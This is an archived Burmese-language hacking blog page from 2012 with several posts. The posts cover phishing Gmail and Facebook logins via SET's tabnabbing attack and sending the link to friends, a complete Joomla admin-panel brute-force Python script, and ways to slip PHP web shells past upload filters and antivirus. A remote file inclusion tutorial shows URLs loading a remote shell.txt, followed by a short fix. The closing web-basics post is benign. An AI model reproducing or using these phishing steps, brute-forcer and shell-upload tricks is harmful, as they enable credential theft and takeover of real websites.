Monday, February 27, 2012

How to Hack Gmail, Facebook with Backtrack 5



Backtrack 5 နဲ႕ phishing လုပ္မွာပါ.......။အရင္ဆံုး Backtrack 5 OS ရိွရပါမယ္..။ကၽြန္ေတာ္လဲ ဒီပ္ု႕ကိုတင္ေန
တုန္းအခ်ိန္မွာ စမ္းသက္တုန္းရိွပါေသးတယ္...ဒါေၾကာင့္ ကၽြန္ေတာ့္ဒီ Tutorial ေလး အမွာပါရင္ခြင့္ လြတ္ေပး
ေစခ်င္ပါတယ္။

အရင္ဆံုး backtrack terminal ကို အရင္ဖြင့္ပါ.......ျပီးရင္ ifconfig လို႕ရိုက္ျပီး သင့္ IP ကိုအရင္ Check ပါ....။



ေနာက္တစ္ဆင့္အေနနဲ႔ Backtrack terminal ျပန္သြားလိုက္ပါ။ျပီးရင္ ...cd  /pentest/exploits/set လို႕ရိုက္
လိုက္ပါ....ျပီးရင္ Social Engineering Toolkit (SET) ./set ကိုဖြင့္လိုက္ပါ..။



ေနာက္တစ္ဆင့္အေနနဲ႕ 
option 2, “Website Attack Vectors”. ကိုေရြးလိုက္ပါ။




ျပီးရင္ option 4 “Tabnabbing Attack Method”. ကိုေရြးပါ။




ျပီးရင္သင္ Phishing လုပ္မယ့္ URL ကိုရိုက္ထည့္ပါ..။EG.......http://mail.google.com/ ေပါ့..Facebook ကိုလိုခ်င္
ရင္လည္း facebook url ထည့္လိုက္ေပါ့......။




ေနာက္တစ္ဆင့္အေနနဲ႕ ပထမဆံုးအဆင့္မွာသင္ရွာထားတဲ့ သင့္ IP ကို google URL shortener ကိုသံုးျပီး
URL တစ္ခုယူလိုက္ျပီးရင္ သင့္သငယ္ခ်င္းေတြဆီးကို အဲဒီ URL ကိုေမးပို႕လိုက္......ၾကိဳက္သလိုသံုးေပါ့ဗ်ာ..




ေအာက္ကပံုက အဲဒီ URL ကိုသံုးျပီးနမူနာျပထားတာ..........။




ေအာက္ကပံုက ရရိွလာတဲ့ RESULT ပါ ...password ေကာ user name ေကာေဖၚျပေပးမွာပါ။




မွတ္ခ်က္ Backtrackကို ကၽြန္ေတာ္ေလ့လာေနတုန္းတင္ေပးလိုက္ရတာဆိုေတာ့ မျပည့္စံုတာ အမွားပါတာ
ဆိုရင္ ခြင့္လြတ္ေစခ်င္တယ္.....။

Backtrack OS Download
Read More ->>

Joomla Administrator Panel BruteForcer python script



ဒါေလးက joomla admin panel ကို bruteforce လုပ္ဖို ့ပါ.. scirpt ကအလုပ္လုပ္ပါတယ္.. သူအလုပ္လုပ္ဖို ့ဆိုရင္ေတာ့ စက္ထဲမွာ python language ထည့္ထားရပါမယ္.. ၿပီးေတာ့ wordlist ဖိုင္တခုထားရပါမယ္.. google it :D
see the -help to see how to use. :)
cmd:

Code:
pythonAdminBrute.py -h


[x] script working pr3vie3w:




Code:

#!/usr/bin/python
# Joomla Administrator Login BruteForcer for v1.0 and v1.5

# Feel free to do whatever you want with this code!
# Share the c0de!

# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, P47r1ck, Tarsian, c0mrade, reverenddigitalx
# and everyone at darkc0de

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

# BE WARNED, THIS TOOL IS VERY LOUD..

import urllib, sys, re, os, socket, httplib, urllib2, time

#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
        SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
        SysCls = 'cls'
else:
        SysCls = 'unknown'

#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
        print "\n|----------------------------------------------|"
        print "| rsauron[@]gmail[dot]com                v1.0  |"
        print "|   7/2008      joomlabrute.py                 |"
        print "|    - Joomla Administrator Panel BruteForcer  |"
        print "| Usage: joomlabrute.py [options]              |"
        print "|                       -h help   darkc0de.com |"
        print "|----------------------------------------------|\n"
        sys.exit(1)

#define varablies
site = ""
dbt = "joomlabrutelog.txt"
proxy = "None"
arg_words = ""
arg_user = "admin"
arg_verbose = "None"
count = 0
gets = 0

#help option
for arg in sys.argv:
        if arg == "-h":
                print "\n   Usage: ./joomlabrute.py [options]        rsauron[@]gmail[dot]com darkc0de.com"
                print "\n\tRequired:"
                print "\tDefine: -u       www.site.com/administrator/"
                print "\tDefine: -w       words.txt"
                print "\n\tOptional:"
                print "\tDefine: -user    \"jorge\"                        Default:admin"
                print "\tDefine: -p       \"127.0.0.1:80 or proxy.txt\""
                print "\tDefine: -o       \"ouput_file_name.txt\"          Default:joomlabrutelog.txt"
                print "\tDefine: -v       Verbose Mode"
                print "\n   Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -v -o site.txt"
                print "   Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -user jorge -p 127.0.0.1:8080\n"
                sys.exit(1)

#Check args
for arg in sys.argv:
        if arg == "-u":
                site = sys.argv[count+1]
        elif arg == "-o":
                dbt = sys.argv[count+1]
        elif arg == "-p":
                proxy = sys.argv[count+1]
        elif arg == "-w":
                arg_words = sys.argv[count+1]
        elif arg == "-user":
                arg_user = sys.argv[count+1]
        elif arg == "-v":
                arg_verbose = sys.argv 
        count+=1

#Title write
file = open(dbt, "a")
print "\n|----------------------------------------------|"
print "| rsauron[@]gmail[dot]com                v1.0  |"
print "|   7/2008      joomlabrute.py                 |"
print "|    - Joomla Administrator Panel BruteForcer  |"
print "| Usage: joomlabrute.py [options]              |"
print "|                       -h help   darkc0de.com |"
print "|----------------------------------------------|"
file.write("\n\n|----------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com                v1.0  |")
file.write("\n|   7/2008      joomlabrute.py                 |")
file.write("\n|    - Joomla Administrator Panel BruteForcer  |")
file.write("\n| Usage: joomlabrute.py [options]              |")
file.write("\n|                       -h help   darkc0de.com |")
file.write("\n|----------------------------------------------|\n")

#Arg Error Checking
if site == "":
        print "[-] Must include -u flag."
        print "[-] For help -h\n"
        sys.exit(1)
if arg_words == "":
        print "[-] Must include -w flag."
        print "[-] For help -h\n"
        sys.exit(1)
if proxy != "None":
        if len(proxy.split(".")) == 2:
                proxy = open(proxy, "r").read()
        if proxy.endswith("\n"):
                proxy = proxy.rstrip("\n")
        proxy = proxy.split("\n")
if site[:7] != "http://":
        site = "http://"+site

#Build proxy list
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
       
        file.write("[+] Building Proxy List...")
        print "[+] Building Proxy List..."
        for p in proxy:
                try:
                    proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                    opener = urllib2.build_opener(proxy_handler)
                    opener.open("http://www.google.com")
                    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                    proxy_list.append(opener)
                    file.write("\n\tProxy:"+p+"- Success")
                    print "\tProxy:",p,"- Success"
                except:
                    file.write("\n\tProxy:"+p+"- Failed")
                    print "\tProxy:",p,"- Failed"
                    pass
        if len(proxy_list) == 0:
                print "[-] All proxies have failed. App Exiting"
                file.write("\n[-] All proxies have failed. App Exiting\n")
                sys.exit(1)
        print "[+] Proxy List Complete"
        file.write("[+] Proxy List Complete")
else:
    print "[-] Proxy Not Given"
    file.write("[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener())
proxy_num = 0
proxy_len = len(proxy_list)

#here we go
print "[+] BruteForcing:",site
print "[+] Username:",arg_user
file.write("\n[+] BruteForcing:"+str(site))
file.write("\n[+] Username:"+str(arg_user))
try:
        words = open(arg_words, "r").readlines()
        print "[+] Words Loaded:",len(words)
        words_len = len(words)
        file.write("\n[+] Words Loaded: "+str(words_len))
except(IOError):
        print "[-] Error: Check your wordlist path\n"
        sys.exit(1)
print "[+] [%s]" % time.strftime("%X")
file.write("\n[+] [%s]" % time.strftime("%X"))
for word in words:
        word = word.replace("\r","").replace("\n","")
        login_form_seq = [
        ('usrname', arg_user),
        ('pass', word),
        ('submit', 'Login')]
        login_form_data = urllib.urlencode(login_form_seq)
        while 1:
                try:
                        gets+=1
                        proxy_num+=1
                        site_get = proxy_list[proxy_num % proxy_len].open(site, login_form_data).read()
                        break
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        pass
        #See where it says Username... change this to whatever your getting back on a incorrect login
        if re.search("Username",site_get) == None:
                print "\n\t[!] Login Successfull:",arg_user+":"+word
                file.write("\n\n\t[!] Login Successfull: "+str(arg_user)+":"+str(word))
                break
        else:
                if arg_verbose != "None":
                        print "[-] Login Failed:",word
                        file.write("\n[-] Login Failed:"+str(word))

#Lets wrap it up!
print "\n[-] [%s]" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()

save the file with
extension to work. have fun :D 

Learn from My Brother


Read More ->>

Shell Uploading By Passing Security Checks



Upload Page ေတြ႕တယ္ Shell Upload လုပ္လို႕မရဘူးဆိုတဲ့ အသံေတြက Beginner ေတြဆီကထြက္တတ္ေလ့ရွိပါတယ္. အခုေတာ့ အဲ့ဒီ့ကိစၥေတြအတြက္ ေရးလို္က္ပါတယ္.။ Developer ေတြလည္း Check လုပ္ႏုိင္ေအာင္ Black Hat မ်ားလည္း အသံုး၀င္ေအာင္ ( ကၽြန္ေတာ့္ထံုးစံအတုိင္း အတြင္းက်က် တတ္ႏိုင္သမွ် ) ေရးေပးလိုက္ပါတယ္။ :-)

ပထမဆံုး Upload Page က Upload Form ကို အရင္ၾကည့္ရေအာင္

<form name=upload action=upload.php method=post>
upload a file : <input type=file name=fileName >
<input type=submit name=upload>
</form>

ရႈပ္ရႈပ္ရွက္ရွက္လည္းမဟုတ္ေတာ့ သိပ္မရွင္းေတာ့ပါဘူး Post Method နဲ႕ တင္တဲ့ File ကို တင္တယ္ေပါ့ :-D  ဒီလိုတင္တဲ့ေနရာမွာ.....

(a) Normal Implementation
အခု ေျပာမွာကေတာ့ Normal Upload Form ပါ.။ Seurity Check မရွိဘဲ ရိုးရိုးတင္ခ်င္တဲ့ File အတင္ခံတဲ့ Upload Page ေပါ့ ။

<?php
$uploaddir = 'uploads/'; // Relative path under webroot
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))
{
echo "File is valid, and was successfully uploaded.\n";
}
else
{
echo "File uploading failed.\n";
}
?>

ပံုမွန္ဆိုတဲ့အတိုင္းပံုမွန္ပါပဲ.။ Upload တင္ခိုင္းတဲ့ File ကို သတ္မွတ္ထားတဲ့ Directory အတိုင္း တင္သြားမယ္.။ ၾကားထဲကမွ Connection Error မ်ိဳးျဖစ္ရင္ Failed ျပမယ္ ဒါပါပဲ.။ ဒီေတာ့ ပံုမွန္အတိုင္းျပႆနာမရွိတင္ႏိုင္ပါတယ္

http://www.site.com/uploads/shell.php

(b) Content Type Verification

ဒီေနရာမွာေတာ့ ခုနကလို တင္ခုိင္းသမွ် ဖိုင္ကို လြယ္လြယ္ကူကူ မတင္ခိုင္းေတာ့ပါ.။ File အမ်ိဳးအစားကို စစ္ျပီးမွ အတင္ခံပါ့မယ္.။ .txt File မ်ိဳး .php File မ်ိဳးကို အတင္မခံေတာ့ပါ. ေအာက္မွာၾကည့္လိုက္ရင္ ရွင္းသြားမွာပါ.။

<?php
//checks if file is Gif or not
if($_FILES['userfile']['type'] != "image/gif")
{
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))
{
echo "File is valid, and was successfully uploaded.\n";
}
else
{
echo "File uploading failed.\n";
}
?>

ၾကည့္လုိက္ပါ.။ ဖိုင္ကို Upload မလုပ္ခင္ .Gif Image ဟုတ္ မဟုတ္ အရင္စစ္ပါတယ္ တကယ္လို႕ မဟုတ္ဖူးဆိုရင္ "Sorry, we only allow uploading GIF images" Alert တက္ခုိင္းပါ့မယ္ ဒီေတာ့ .php လိုမ်ိဳးကို ဒဲ့တင္လို႕မရေတာ့ပါ :lol
သုိ႕ေသာ္လည္း GIF Image မဟုတ္တဲ့ ဖိုင္ကိုတင္မယ္ဆိုရင္ HTTP Request ကေတာ့ ဒီလိုသြားေနပါလိမ့္မယ္

POST /upload2.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 156
--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: text/plain

ဒီလို Security Check လိုဟာမ်ိဳးကိုေတာ့ Temper Data လို Firefox Addon နဲ႕ Shell တင္ႏုိင္ပါတယ္ :-P
( C ) File Name Verification

ဒီတခါေတာ့ Developer က File ရဲ႕ Extensions ကို စစ္ျပီးမွ အတင္ခံမွာျဖစ္ပါတယ္။ တစ္ခ်က္ၾကည့္ရေအာင္.။

<?php
$blacklist = array(".php", ".phtml", ".php3", ".php4");
foreach ($blacklist as $item)
{
if(preg_match("/$item\$/i", $_FILES['userfile']['name']))
{
echo "We do not allow uploading PHP files\n";
exit;
}
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
}
else
{
echo "File uploading failed.\n";
}

ၾကည့္လိုက္ပါ ပထမဆံုး လာလာခ်င္းမွာပဲ .php , .phtml , php3 စတဲ့ အႏၱရာယ္ရွိႏိုင္ေသာ Extensions မ်ားကို Blacklist လုပ္ျပီး ပိတ္ခ်ပစ္လိုက္ပါတယ္ ျပီးမွ We do not allow uploading PHP files
ဆိုျပီး Alert တက္ခုိင္းတယ္ ျပီးမွ Upload Form ဆက္ပါတယ္
ဒီလို Check မ်ိဳးကိုေတာ့ Nulled Byte သံုးျပီး Extension ဆင့္ခံျခင္းျဖင့္ တင္ႏိုင္ပါတယ္
Shell.php.gif လုိေပါ့..။

ဒါဆို ပံုမွန္အတုိင္းပဲ http://www.site.com/uploads/Shell.php ဆိုျပီး Shell ကို Access လုပ္ႏုိင္ပါျပီ.။









( D ) Image File Content Verification

ဒီတစ္ခုကေတာ့ အရင္ဟာေတြထက္ အဆင့္ျမင့္သြားပါတယ္ Image ဆိုရင္ေတာင္ Image File Content ကို ကိုယ္တုိင္စစ္ျပီး ဟုတ္မွ အတင္ခံမွာပါ Extensions ေတြနဲ႕တင္မဟုတ္ပဲေပါ့ :-D

<?php
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']); //check image size
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg')
{
echo "Sorry, we only accept GIF and JPEG images\n";
exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}

အထက္ပါ Code ကိုၾကည့္လိုက္ရင္ သိသာပါတယ္. Image File ဟုတ္ရဲ႕လားဆိုျပီး ေသခ်ာ မေသခ်ာစစ္ျပီးမွ အတင္ခံတာပါ ဒါမ်ိဳး Security Check ကိုေတာ့ Gimp လို Image Editor မ်ိဳးသံုးျပီး Shell Code ကို GIF Image ထဲ Embedded လုပ္ျပီး တင္ရပါမယ္ ဒီေတာ့ Security Check က စစ္ေတာင္ Image Code ေတြေတြ႕တဲ့အတြက္ Image File ဆိုျပီး အတင္ခံမွာပါ ဒါေပမယ့္ Shell ကိုသြား Access လုပ္တဲ့အခါမွာေတာ့

http://www.site.com/uploads/shell.gif ဆိုရင္ GIF Image ကို ေတြ႕ရမွာျဖစ္ျပီး

http://www.site.com/uploads/shell.php ဆိုရင္ shell ကို Access လုပ္ႏိုင္မွာျဖစ္ပါတယ္ :-D

( E ) Antivirus

အေရွ႕မွာေျပာခဲ့ဟာ အားလံုးဟာ Upload Form မွာတင္ Check လုပ္ေနတဲ့ Security Check ေတြပါ Upload Form ကိုေက်ာ္လႊားႏုိင္ခဲ့ေပမယ့္ Server မွာ Run ထားတဲ့ Antivirus က Shell Script ကို ဖ်က္ခ်ပစ္ပါတယ္ ဒီေတာ့ Shell ကို Encrypt လုပ္ရပါ့မယ္.။ Shell Script ဆိုတာကလည္း PHP Script ေတြပဲျဖစ္လို႕ PHP Encrypter ေတြနဲ႕လုပ္ရပါမယ္ Google မွာ PHP Encrypter ေတြအမ်ားၾကီးရွိပါတယ္ ၾကည့္ၾကပ္သံုးလို႕ရပါလိမ့္မယ္..။
ကဲ ျပီးပါျပီ နည္းနည္း လည္း ရွည္သြားပါတယ္.ကၽြန္ေတာ့္ရဲ႕စာေတြဟာ တစ္စံုတစ္ဦးကိုမွ် အဆိပ္မသင့္ဖို႕ေမွ်ာ္လင္ပါ့တယ္
Read More ->>

RFI Hacking Technique



RFI Hacking ဆိုတာ ေလးကို အရင္ေျပာပါ့မယ္.။ RFI Hacking ရဲ ႔အရွည္က Remote File Inclusion ျဖစ္ျပီး Remote ဆိုတဲ့အတုိင္း Website တစ္ခုကို အျခား Website ကေန ထိန္းခ်ဳပ္ျခင္းပါ..
ပထမဦးဆံုး Exploit Code ကိုအရင္ၾကည့္ရေအာင္…။
PHP Code:
$page = $_GET['page'];
include(“”.$page.”.html”);
include Command က တဆင့္ တျခား Website က Webpage ကို ကူးယူႏိုင္တဲ့ Vuln ကို ျဖစ္ေစပါတယ္..။ ဥပမာ…Website တစ္ခုမွာ
1.Music
2.Video
3.contact ဆိုတဲ့ Page သံုးခုရွိမယ္ဆိုပါစို႔…။ Index ေကာပါရင္ ေလးခုေပါ့ဗ်ာ.။ ဒီေတာ့
1.music.php
2.video.php
3.contact.php
4.index.php ဆိုျပီး ေလးခုရွိပါမယ္ ( Index Page မွာေတာ့ Page Header ေတြ Footer ေတြ ပါမယ္ေပါ့ဗ်ာ..)
အဲ့ဒီ့ Page ေလးခုကို သြားခ်င္ရင္ -
http://www.target.com/index.php
http://www.target.com/index.php?=music.php
http://www.target.com/index.php?=video.php
http://www.target.com/index.php?=contact.php ဆိုျပီး သြားရပါလိမ့္မယ္.။
ဒီလို ဘာလို႔ သြားလို႔ရတာလဲဆိုတာကို ေျပာဖို႔ Vuln ျဖစ္ေနတဲ့ Index Page ရဲ ႔ Code ေလးကိုၾကည့္ရေအာင္..။

PHP Code:
//html for header
//html for menu
<?php
$page = $_GET['page'];
include($page); ?>
//html for footer
php Code ရဲ ႔ Line No.2 ကိုၾကည့္လို္က္ပါ. Get Method ကို ေတြ ႔ပါလိမ့္မယ္.။ အဲ့ဒီ့ Get Method ေၾကာင့္ ကၽြန္ေတာ္တုိ ႔ Page ေတြကိုသြားတဲ့အခါမွာ
http://www.target.com/index.php?=video.php လို႔ သြားခြင့္ရွိတာပါ..။ Coding မွာ ၾကည့္လိုက္ပါ.. လိုင္း နံပတ္ ၅ က include ေၾကာင့္ video Page မွာ Copy ကူးျပီး Index မွာ video.php အေနနဲ႔ တက္လာတာပါ..။ ဒါေပမယ့္ အဲ့ဒီမွာၾကည့္လိုက္ပါ page ကို Variable ေၾကညာမထားပါ ဒါက အၾကီးမားဆံုး Security အမွားၾကီးပါ.။ ဒီသေဘာအရဆို တျခား အေ၀းက Website တစ္ခု ကိုေကာ Copy ကူးျပီး index မွာလာခ်ိတ္လို႔ ေကာ မရဘူးလားလို ႔ ေမးလာရင္ ရပါတယ္
http://www.target.com/index.php?=http://www.google.com/? လို႔ သာ ရိုက္လိုက္ရင္ google Page ဟာ Copy ကူးျပီး Index Page မွာ တက္လာပါေတာ့တယ္
google မဟုတ္ဘဲ တျခား ၾကိဳက္တဲ့ Page တင္လို႔ရတာေၾကာင့္ ကၽြန္ေတာ္တို႔ ဟာ shell link ကုိ ထည့္ျပီး Target Website ကိုထည့္ခ်ဳပ္လိုက္ပါေတာ့တယ္.။ ေအာက္မွာၾကည့္ပါ..။
http://www.target.com/index.php?page=ht ... /shell.txt ဆိုျပီး ခ်ိတ္လိုက္တာနဲ႔ Text File အေနနဲ႔ သိမ္းဆည္းထားတဲ့ Shell ကို excute လုပ္ျပီး Target Website ေပၚမွာ လာ Run တဲ့ အတြက္ ကၽြန္ေတာ္ဟာ Target ရဲ ႔ Website ကို ထိန္းခ်ဳပ္ ခြင့္ရွိသြားပါျပီ..။
…………………………………………………
RFI Exploit ျဖစ္ေစတဲ့ အျခား ဥပမာ တစ္ခုကို ထပ္ျပီး တင္ျပပါ့မယ္..။ Undefined Variable ပါ..။ Programming ကို Basic ေလာက္ နားလည္တဲ့လူဆိုရင္ေတာ့ Variable ဆိုတာ ဘာလဲ လို႔ ထပ္ရွင္းျပဖို႔ မလုိေတာ့ပါဘူး ဒီေနရာမွာ Hacking Method ကို ပဲ ေျပာျပမွာ ျဖစ္လို႔ Variable ဆိုတာ ကို ရွင္းျပမေနေတာ့ပါဘူး..။
Developer တစ္ေယာက္ဟာ သူ ႔ ရဲ ႔ Website ကို သူ ႔ရဲ ႔ Mysql Server နဲ ႔ ခ်ိတ္ဆက္ခ်င္ပါတယ္.။ ဥပမာ..သူ ႔ ဆိုဒ္ Index Page မွာ Content ေတြ ကို Mysql နဲ႔ ခ်ိတ္ထားခ်င္တယ္ဆိုပါစို႔. Mysql Server ကို ခ်ိတ္ဆက္ဖို႔ဆိုရင္ User Name နဲ ႔ Password တစ္ခု လို္အပ္ပါလိမ့္မယ္..။ အဲ့ဒီ့ User Name နဲ႔ Password ကို db_details.php ဆိုတဲ့ File ထဲမွာ သိမ္းထားပါတယ္.။
တကယ္လုိ ႔ ကၽြန္ေတာ္တို႔ဟာ video.php ဆိုတာကို index Page က တစ္ဆင့္ ဖြင့္တယ္ဆိုပါစို႔ဗ်ာ.။
http://www.target/index.php?page=video.php

တကယ္လို႔ အဲ့ဒီ့ Page က PHP Code ကိုၾကည့္မယ္ဆိုရင္..
PHP Code:
//html for header
//html for menu
<?php
$database_config_file = “db_details.php”;
$page = $_GET['page'];
include($page);
?>
//html for footer <?php
include($database_config_file);
//code to connect to MySQL and get the latest updates
?>
Index Page မွာ $database_config_file ကို db_detils.php နဲ႔ ခ်ိတ္ထားတာကို ေတြ ႔ရပါမယ္..။ ဒါေပသိ ကၽြန္ေတာ္ တို ႔ ခုေရာက္ေနတဲ့ ေနရာက video.php ျဖစ္တဲ့အတြက္ အဲ့ဒီ့ db_detils.php နဲ႔ခ်ိတ္ဖို႔ မလိုအပ္ပါဘူး..ဒီေနရာမွာ လာခ်ိတ္ေနတာေတြ ႔ ရ မွာပါ..။ အဲ့ဒီ့ ေနရာမွာ ျပႆနာ တက္သြားတာပါ..။ ဒီေတာ့ ထံုးစံ အတိုင္း ကၽြန္ေတာ္တို ႔ရ ဲ ႔ Shell Link ကို ခ်ိတ္ခြင့္ရွိသြားပါျပီ..။
http://www.target/index.php?page=http:/ ... /shell.txt ေပါ့ဗ် 

RFI Hacking Technique ကေတာ့ ဒီေနရာမွာ ျပီးသြားပါျပီ..။ ေအာက္ဟာကေတာ့ Countermeasure ေလးပါ..။
Countermeasure

ေရွ ႔မွာ သီအိုရီ ေျပာခဲ့တဲ့ အတိုင္း include Method ေၾကာင့္ Copy ကူးျပီး Get နဲ႔ လွမ္းယူလိုက္တာျဖစ္တဲ့အတြက္ ဘယ္ကဟာကို လွမ္းယူရမယ္ဆိုတာ အတိအက် ေျပာေပးလိုက္ရင္ ကူးခ်င္တဲ ့ ဆိုဒ္ကို Copy ကူးခြင့္ေပးမွာ မဟုတ္ဘဲ တိတိက်က် ျဖစ္သြားမွာပါ 
PHP Code
<?php
$page = $_GET['page'];
switch($page){
case “videogames”;
include(“videogames.php”);
break;
case “contact”:
include(“contact.php”);
break;
case “music”:
include(“music.php”);
break;
default: //A page wasn’t chosen, or one that wasn’t “home” or “gallery”
echo “Choose a page from our fine selection!1!!”;
break;
}
?>
အခုဆိုရင္ RFI Hacking ကို ေသေသခ်ာခ်ာ နားလည္ သြားေလာက္ျပီ ထင္ပါတယ္…။
အားလံုး အဆင္ေျပၾကပါေစ…။

source By Ghostarea.net
Read More ->>

Web Developing Necessary for Begineers



ဘယ္လိုေခါင္းစဥ္ကိုတပ္ရမွန္းကို မသိေတာ့ဘူး ........mmhackforums.noonhost.com မွာ










Website တစ္ခု တက္ဖို႔ရာအတြက္ ပထမဆံုး ႏွစ္ခုလိုပါတယ္
၁. Domain ႏွင့္
၂.Host ပါ ( Host ထဲက Data လည္းပါတာေပါ့ )

ကဲ စဥ္းစားၾကည့္ရေအာင္ ကၽြန္ေတာ္တို႔ ဆိုဒ္တစ္ခုကို ေခၚလိုက္မယ္ Browser
ကေနေပါ့ www.ghostarea.net လို႔ရိုက္လိုက္တယ္ Enter .. ဆိုဒ္တက္လာတယ္ ဒါက
အျပင္ပိုင္း ရလာဒ္ Output
အတြင္းပိုင္းမွာ အလုပ္လုပ္တာသြားၾကည့္ရေအာင္ www.ghostarea.net
လို႔ရိုက္လုိက္တာနဲ႔ www.ghostarea.net ဆိုတဲ့ Domain ဟာ သူ ႔ကို
ခ်ိတ္ဆက္ထားတဲ့ Host ထဲက Index File ကုိယူလာတယ္ ျပီးမွ Browser
ေပၚတင္ျပီး User ေရွ ွ႔ခ်ျပတယ္ ဒီထိရွင္းပါတယ္ေနာ္
လြယ္ပါတယ္ဗ် ေမေမက ညီ့ကို ၾကက္ဥ၀ယ္ခိုင္းတယ္ ၾကက္ဥဆုိင္ကိုလည္း
စာနဲ႔ေရးေပးလိုက္တယ္ ညီညီဟာ ၾကက္ဥဆုိင္လိပ္စာကိုၾကည့္ျပီး ၾကက္ဥ၀ယ္လာတယ္
ေမေမ့ကို ေပးလိုက္တယ္ ဒါဆို ေမေမက User ညီညီက Browser လိပ္စာက Domain
ၾကက္ဥက Index File
:D ဒီေတာ့ Website တစ္ခုတက္ဖို႔က ဒိုမိန္းနဲ႔ host
ခ်ိတ္ျပီးတက္လာတာဆိုတာေတာ့သိေလာက္ပါျပီ
ေတြးၾကည့္ဗ် ဒါဆို Domain တစ္ခုမွာခ်ိတ္ဆက္ထားတဲ့ေနရာတစ္ခုပဲရွိရမွာေပါ့
ဟုတ္ဖူးလား ဒီေတာ့ ဒိုမိန္း နာမည္အတူတူမရွိဘူး ကမၻာေပၚရွိ မည္သည့္
ဒိုမိန္း နာမည္မွ် မတူညီၾကပါ ဥပမာ www.ghostarea.net သာ ႏွစ္ခုရွိေနရင္
Host ကလည္း ႏွစ္ခုကိုသြားခ်ိတ္ေနၾကမွာေပ့ါ
တကယ္လို႔ ကၽြန္ေတာ္က Browser ကေန www.ghostarea.net ဆို ဒိုမိန္းက
ဘယ္ဒိုမိန္းလဲ ghostarea ပထမဟာလား ဒုတိယ Ghostarea လား ဆိုျပီး
ေ၀ခြဲမရျဖစ္ျပီး ျပႆနာေတြတက္ကုန္မွာေပါ့ဗ် ဟုတ္ဖူးလား :D
ဒါဆုိ Domain နဲ႔ Host ကို နားလည္ေလာက္ျပီ ဒီေနရာမွာ Security အပိုင္
းနည္းနည္း၀င္ပြားခ်င္တယ္ဗ် DDos ဆိုတာ ၾကားဖူးမွာပါ server ကို Overload
ျဖစ္ေအာင္လုပ္ျပီး ခ်တာေပါ့ဗ်ာ လြယ္လြယ္ေျပာရရင္ Website
တစ္ခုတက္မလာေအာင္ Sever ကို Overload ျဖစ္ေအာင္
ခ်တယ္ဆိုတာ လြယ္တာမွမဟုတ္တာဗ် Host ဆိုတာက အၾကီးၾကီး
ခံႏိုုင္ရည္အားကလည္းနည္းတာမဟုတ္ဖူး ဒီေတာ့ ဟက္ကာေတြဘာလုပ္လဲ Domain ကို
Attack လုပ္ျပီး Host နဲ႔သြားမခ်ိတ္ေအာင္ ခ်လုိက္ေရာ ဒီေတာ့ Website က
တက္မလာေတာ့ဘူးတကယ္ေတာ့
Server က အလုပ္လုပ္တယ္ေနာ္ Domain ေၾကာင့္ သာေဒါင္းသြားတာ ဟီး
ကဲ Website ရဲ ႔အလုပ္လုပ္ပံုအေၾကာင္းျပီးျပီ Website
အမ်ိဳးအစားေတြအေၾကာင္း ေျပာရေအာင္
သူလည္းပဲ ႏွစ္ခုရွိပါတယ္
1.Static
2.Dynamic
Static ဆိုတာက ဘယ္ေတာ့မွ မျပင္တဲ့ဆိုဒ္ေတြပါ ျမင္ဖူးမွာပါ ျမန္မာ
ႏုိင္ငံေရလုပ္ငန္း ဦးစီးဌာနဆုိဒ္ဆိုပါစို႔ Page ကေလး ႏွစ္ခုပဲ ပါတယ္
ဘယ္ေတာ့မွကို မျပင္ဘူး သူက Company Information ေလးေတြေပးရံုပဲကိုးဗ်
ဒီေတာ့ ဒီ Page ကေလး ႏွစ္ခုကို
html နဲ႔ ေရး CSS နဲ႔ မိတ္ကပ္ျပင္ေပးျပီး တင္ေပးထားရံုပဲ ဘာမွ ျပႆနာမရွိဘူး
Dynamic မွာက် အဲ့လို မရေတာ့ဘူး Dynamic ဆိုတာ အျမဲျပင္ေနတဲ့ဆုိ္ဒ္ေတြ
စာေတြအျမဲတင္ေနတယ္ ဆုိဒ္က အျမဲ Active ျဖစ္ေနတယ္ Blog
ေတြကိုေျပာတာေပါ့ဗ်ာ ကဲ အဲ့လိုေနရာမွာသာ ခုနကလို html နဲ႔ေရးရရင္
စာေလးတစ္ပုဒ္တင္တုိင္း Home Page ကို
ျပန္ေဒါင္း ကုတ္ဒ္ေတြျပန္ျပင္ ျပန္တင္ ဆိုေသရခ်ည္ရ ႔ဲ
